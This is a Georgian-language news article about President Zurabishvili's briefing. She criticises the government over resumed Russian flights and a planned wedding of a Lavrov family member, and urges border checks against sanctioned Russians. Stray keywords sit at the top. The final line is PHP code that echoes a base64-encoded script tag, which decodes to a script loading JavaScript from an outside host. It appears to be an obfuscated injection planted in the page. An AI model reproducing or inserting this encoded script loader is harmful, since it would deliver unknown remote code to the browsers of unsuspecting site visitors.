celsiusi
ავერსი საქკაბელი

მინდა მივმართო ხელისუფლებას, რომ არ შეიძლება ასე ეთამაშოთ თქვენ ხალხს, ჯერ დაიწყო ფრენები, ვიღაცები დადიან, გვეუბნებიან და გვიხსნიან, თუ რამდენად გახარებული არიან იმით, რომ ფრენები აღდგა. ეს არის ქართველი ხალხის შეურაცხყოფა , - ამის შესახებ საქართველოს პრეზიდენტმა ბრიფინგზე განაცხადა.

როგორც მან განმარტა, ის ფაქტი რომ დღეს, სერგეი ლავროვის ოჯახის წვერის ქორწილის მეორე ნახევარი „ყვარლის ტბაზე“ არ გაიმართება, ქართველი საზოგადოების დამსახურებაა.

„მე ვიცი, რომ დღეს, ჩვენი საზოგადოება ძალიან აღელვებულია და შემიძლია ვთქვა, მეც. ვუახლოვდებით 26 მაისს და თუ 26 მაისს ვაპირებთ, რომ რაღაც მაღალფარდოვანი, პატრიოტული სიტყვებით გამოვიდეთ და ამ დროს, სულ სხვა რამ ხდებოდეს ამ ქვეყანაში, ეს სასაცილოა, თუ არა, სატირალი. საზოგადოებას მინდა ვუთხრა, რომ ამაზე პასუხი არც სასოწარკვეთილებაა და არც უიმედობა. პირველ რიგში, მინდა გითხრათ, რომ ამ დღევანდელ ინციდენტზე, საკმაოდ გამიჭირდა დაკავშირება, მაგრამ მივიღე ბოლოს პირობა შინაგან საქმეთა მინისტრიდან, რომ წასულები არიან ის ადამიანები, ის ოჯახი, რომლებიც აპირებდნენ დღეს ქორწილის მეორე ნახევრის გადახდას და ქორწილი აღარ ჩატარდება დღეს. ეს არის საზოგადოების ერთგვარი გამარჯვება, როგორც თავის დროზე იყო გავრილოვის ამ ქვეყნიდან გასვლა, მაგრამ ეს არის ერთი ინციდენტი და ამით პრობლემა არ იხსნება.

მინდა მივმართო ხელისუფლებას, რომ არ შეიძლება ასე ეთამაშოთ თქვენ ხალხს, ჯერ დაიწყო ფრენები, ვიღაცები დადიან, გვეუბნებიან და გვიხსნიან, თუ რამდენად გახარებული არიან იმით, რომ ეს ფრენები აღდგა. ეს არის ქართველი ხალხის შეურაცხყოფა, რომელმაც ძალიან კარგად იცის, თუ რანაირად უნდა დაიცვას თავისი ღირსება, დამოუკიდებლობა და არავის საჩუქრები არ სჭირდება არავისგან და პირველ რიგში იმ ქვეყნისგან, რომელიც ჩვენი მუდმივი ოკუპანტია არა დღეს - გუშინ, გუშინწინ. არ შეიძლება, ხელისუფლება ამ სიტუაციაში, რომელიც ძალიან დაძაბულია იმ ომიდან გამომდინარე, რომელიც რუსეთმა წელიწადი და 3 თვეა უკრაინის წინააღმდეგ დაიწყო, არ შეიძლება, ამ პირობებში ითამაშო ხალხის ნერვებზე. ამ ქვეყანას, ამ ხალხს გავლილი აქვს უკვე ყველაფერი და ჩვენ კარგად ვიცით ყველაფერი, ამ ხალხს გაფრთხილება და დაცვა უნდა. ყველას გვაქვს ჩვენი წილი ვალდებულება, საზოგადოება ყველაფერს აკეთებს და როგორც ვთქვი, საზოგადოების მიღწევაა, რომ ეს ხალხი დღეს წავიდა, მაგრამ საზოგადოებას ამაზე მეტი არ შეუძლია.

მეც მაქვს ჩემი ვალდებულება, რომელიც არის, ვიყო სადარაჯოზე, რომ სიტყვა, რომელიც დამრჩენია, ის სიტყვა ყველგან გამოვიყენო, სადაც საჭიროა. დღეს აქ, ხვალ ბრიუსელში და სადაც საჭირო იქნება იმისთვის, რომ ეს ქვეყანა იყოს თავის ადგილას, სადაც მას ეკუთვნის. ცხადია, ხელისუფლებას, მთავრობას თავისი ძალიან დიდი პასუხისმგებლობა აქვს, პირველ რიგში, საზღვარი იყოს დაცული. რას ნიშნავს, არ ვიცოდით ვინ შემოვიდა, რას ნიშნავს, რომ სანქცირებული და თან როგორი სანქცირებული, ყველაზე მაღალი თანამდებობის პირის შვილი, იმ წრიდან, რომელიც უშუალოდ პუტინის წრეა, ჩამოდის ქვეყანაში და არ ვიცით? გუშინ არ იცოდნენ თურმე, რომ სააკაშვილი შემოსული იყო, დღეს არ იციან, რომ შემოდიან რუსები როგორც უნდათ და სანქცირებული რუსები. ხელისუფლებას მოვუწოდებ, საჩქაროდ შემოიტანონ - ძალიან კარგად ვიცი, როგორ მუშაობს ეს სანქციები, ის სიები, ჩვენი პარტნიორი ქვეყნების, თუ რომელი პირები არიან სანქცირებული და ამ სიებით ვიხელმძღვანელოთ საზღვარზე, რომ არავინ შემოვიდეს, რომელიც სანქცირებულია. ეს მინიმუმი დაცვაა ამ ქვეყნის, რომელიც ისედაც თავისი გეოპოლიტიკური მდგომარეობიდან გამომდინარე ასეთი საფრთხის ქვეშაა და საჭიროა, უფრო მეტად დაცული იყოს, ვიდრე ის ევროპული ქვეყნები, რომლებიც ბევრად შორს არიან და ბევრად დაცული. ეს ევალება ხელისუფლებას“, - განაცხადა ზურაბიშვილმა.

299
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");